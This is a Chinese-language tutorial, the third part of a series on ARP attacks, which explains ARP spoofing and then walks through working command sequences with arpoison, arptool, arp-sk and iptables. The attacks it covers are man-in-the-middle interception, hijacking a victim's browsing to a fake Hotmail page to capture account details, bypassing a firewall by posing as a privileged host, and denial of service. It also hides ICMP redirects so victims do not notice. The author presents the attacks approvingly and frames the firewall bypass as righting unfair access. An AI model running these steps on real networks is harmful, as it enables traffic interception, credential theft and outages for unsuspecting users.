战术攻防之近距离搏击篇(ARP)攻击(3)

虽然MAC泛洪的攻击方式带了一些恐慌，但是由于这种方式在很多场合成功概率不高，且这种攻击方式太过于激进，以至于聪明的网管能很快分析网络并马上制止这种行为的扩散，因此一种称之为ARP欺骗的隐蔽的ARP中毒演变攻击进入了Cyber空间。

首先假设一个场景：假如主机A要想获得主机B的MAC，它需发送arp-request数据包到广播地址，主机B会以自身地址回应这个请求。但假如主机C在主机B之前作出回应。主机A则在其缓存中设置主机C的MAC地址。

12:50:31.198300 arp who-has hostB tell hostA   [1]

12:50:31.198631 arp reply hostC is-at 4e:73:02:4b:3f:94  [2]

于是我们构造了欺骗行为，但由于主机A发送的是广播包，因此主机B也会应答：

12:50:31.198862 arp reply hostB is-at 4e:80:51:d1:5e:f5  [3]

那么主机A的ARP缓存很有可能被刷新，但是由于缓存的无验证即时更新机制，只要主机C不断发送伪造的回应包，那么主机A的缓存列表中就能一直保存主机C的MAC地址。(假如主机不发送arp-request，向其发送arp-reply并无太大意思，因为缓存不会更新一个不存在的记录)。其实现原理如图：

了解ARP欺骗的方式后，其准确定义如下：利用以太和IP协议之间的交互关系而形成的攻击方法，比如，伪造目标计算机的MAC地址以获取其控制权。其表现形式为构造虚假arp-request和arp-reply数据包以实现欺骗目的。

这种欺骗方式主要用于交换网络结构(对于HUB结构，可以直接对目标主机进行强制控制，使用欺骗方式似乎是种累赘),因此交换网的坚固性似乎变的脆弱很多。

使用arpoison小程序可以发送自定义硬件和IP地址的arp-reply包给目标主机，对其实行欺骗行为。

[root@hackersvr arpoison]# ./arpoison –I eth0 –d {hostA_ipaddr} –s {hostB_ipaddr} –t 00:13:0E:19:85:03 –r {hostC_mac_addr}ARP packet sent via eth0

# 1、主机C大量使用自己MAC回应主机A的请求，导致主机A被蒙骗与主机进行通信。

# 2、假如{- r}参数所设置的MAC为一个不存在的MAC地址，则会导致主机B与主机C之间的TCP

# 会话临时性强行断开。

# 3、假如想更新网络中所有主机系统，可以发送广播MAC地址FF:FF:FF:FF:FF:FF

◆中间人攻击(Man In the Middle，MIM)

在ARP方式的攻击，最有意思的环节莫过于MIM，这种非常隐蔽方式可以在两台通信的计算机之间进行桥接方式的监听，并且非常不容易被发现，可谓是偷盗学术上的典范运用。

攻击者驳接本地网络，分别向主机A和主机B发送适当的伪造Arp-reply包，蒙蔽其所认为的正确的通信目标，并建立转发规则，实现主机A与主机B之间的数据通信。使数据链路表面上看似A与B的正常通信，实则通过了攻击者的机器进行代理转发。

采用arptool可以轻松实现这类入侵方式：

arptool用法: arptool

用于发送数据包的网卡

发送的ARP类型包

tell    arp-reply类型数据包

bcast   当攻击对象是linux操作系统，可使用此参数代替tell

/        目标IP/MAC地址对

/        源IP/MAC地址对

1、分别对主机A/B实施ARP攻击

[root@hackersvr arptool]#ping 192.168.1.1
[root@hackersvr arptool]#ping 192.168.1.2
[root@hackersvr arptool]#arp –a
?(192.168.1.1) at 01.01.01.01.01.01 [ether] on eth0
?(192.168.1.2) at 02.02.02.02.02.02 [ether] on eth0
[root@hackersvr arptool]# ./arptool eth0 tell 192.168.1.1 01:01:01:01:01:01 192.168.1.2 03:03:03:03:03:03
[root@hackersvr arptool]#./arptool eth0 tell 192.168.1.2 02:02:02:02:02:02 192.168.1.1 03:03:03:03:03:03

现在我们可以透明代理主机A/B之间的应用程序数据通信?，比如攻击者可以修改主机A/B之间的HTTP事务提交，但这需要我们在其间建立桥接转发关系。

2、桥接主机A/B之间通信

[root@hackersvr arptool]＃e cho 1 > /proc/sys/net/ipv4/ip_forward
[root@hackersvr arptool]#iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2
-d 192.168.1.1 --dport 80 -j REDIRECT --to-port 80

通过这种方式，我们可以监听、修改、切断和劫持主机A/B之间的任何应用通信数据，似乎整个网络陷落在一种前所未有的慌乱之中。

◆知识组合攻击

arp-sk在arp方式攻击中，享有“瑞士军刀”的美誉，它可以维护所有设备的ARP表。通过发送适合的ARP数据包，它可以实现ARP的所有类型攻击，非常强悍的工具。本节将采用arp-sk讲解会话劫持、偷越防火墙和拒绝服务攻击的思维方式。

1、 代理会话劫持(hijacking)

攻击者架设HTTP服务器模拟远程网站的一部分站点(这部分网页用于劫持主机B客户输入相关信息，例如用户名或ID)。而不需要模拟的站点则代理转发至真实站点，这种高超的诈骗技巧非常 隐蔽。当我们尽情享受网络冲浪的愉快时，谁会想到这是个陷阱？

发送arp-reply分别攻击防火墙和目标主机

[root@hackersvr arp-sk]# ./arp-sk -r -d 192.168.1.2 -S 192.168.1.4 -D 192.168.1.2
+ Running mode "reply"
+ IfName: eth0
+ Source MAC: 03:03:03:03:03:03
+ Source ARP MAC: 03:03:03:03:03:03
+ Source ARP IP : 192.168.1.4 (gateway)
+ Target MAC: 02:02:02:02:02:02
+ Target ARP MAC: 02:02:02:02:02:02
+ Target ARP IP : 192.168.1.2 (hostB)
[...]
[root@hackersvr arp-sk]# ./arp-sk -r -d 192.168.1.4 -S 192.168.1.2 -D 192.168.1.4
+ Running mode "reply"
+ IfName: eth0
+ Source MAC: 03:03:03:03:03:03
+ Source ARP MAC: 03:03:03:03:03:03
+ Source ARP IP : 192.168.1.4 (hostB)
+ Target MAC: 04:04:04:04:04:04
+ Target ARP MAC: 04:04:04:04:04:04
+ Target ARP IP : 192.168.1.4 (gateway)
[...]
# 代理转发非hotmail(207.68.171.233)的一切站点(攻击者模拟hotmail站点，伪装提供服务)
[root@hackersvr arp-sk]# iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2 \
-d !207.68.171.233 --dport 80 -j REDIRECT --to-port 80

代理转发非hotmail(207.68.171.233)的一切站点(攻击者模拟hotmail站点，伪装提供服务)

[root@hackersvr arp-sk]# iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2 \
-d !207.68.171.233 --dport 80 -j REDIRECT --to-port 80

当使用转发设置，目标主机使用ping命令可以检测到其数据包的重定向，因此这里阻挡icmp重 定向的信息。

[root@hackersvr arp-sk]# echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects

OK，剩下的事情就是如何如何使用嗅探工具、数据捕获工具或自行定义的脚本来观测目标主机的# 冲浪行为，并可以掌握他所有一切上网信息，诸如：邮件帐户、论坛ID等。(这些使用方法超出

本文所论述的arp攻击行为，不予讨论)

2、 偷越防火墙

网络权利的不均衡总惹闹一些自负的家伙。由于网管的存在和防火墙的规则的设置，使得某些具有特权的计算机才能任意的访问整个互连网，这为其它机器的使用者潜埋下嫉妒和羡慕的心理成分。为了反击这种权利不均衡，Arp方式的欺骗访问再一次获得成功！?

原理图六中，虚线代表主机B的正常出网访问，通过Arp攻击后，攻击者以主机B的身份特权对互连网进行任意访问，并分离主机B的网络访问，使主机B网络访问正常无异，防火墙的访问限

制形如虚设。

只需要对防火墙进行攻击，不需要对主机B实施攻击

[root@hackersvr arp-sk]# arp-sk -r -d 192.168.1.4 -S 192.168.1.2 -D 192.168.1.4

使用Linux的Netfilter框架，很容易分离属于攻击者网络访问流和属于主机B的网络访问流

[root@hackersvr arp-sk]# iptables -t nat -A POSTROUTING -j SNAT --to 192.168.1.2

一切的完美几乎就在几句简单的语句之间完成，我想起史蒂文?列维的几句真言：

1、进入（访问）计算机应该是不受限制的和绝对的；

2、一切信息都应该是免费的；

3、怀疑权威，反对垄断；

4、任何一个人都能在计算机上创造艺术和美；

5、计算机能够使生活变得更美好

于是，攻击在此刻似乎也变的美丽了许多。

3、 拒绝服务攻击(DoS)

有了上面学习过程，这里实现Dos攻击的方式变的相当简单，对于攻击者所代理转发的数据包进行阻塞，从而达到这种卑劣的目的。(我相当反感这种攻击方式，因此我也非常讨厌驾御它进行攻击的人，因此我希望这类攻击方式只用于实验目的，不要滥用！)

利用Linux得力的iptables工具，方便实现数据堵塞

[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.1 -j DROP
[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.2 -j DROP
[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.4 -j DROP

另一种方式是制造一个Mac”黑洞”，既使用不存在的mac地址使目标主机从网络地图上消失。

如下句法使hostA认为hostB已经离开网络了：

[root@hackersvr arp-sk]# arp-sk -r -d hostB -S hostA --rand-arp-hwa-src -D hostB

通过了解Arp原理，我们发现这些攻击方式非常有趣，并且思路简单，实现方法也相当容易。但这些小技巧不过是Arp攻击的基础层面，下面的部分将深入讨论一些Arp高级利用技巧，其攻击思维的精妙之处令我赞叹不止。

服务器租用/服务器托管中国五强！虚拟主机域名注册顶级提供商！15年品质保障！--亿恩科技[ENKJ.COM]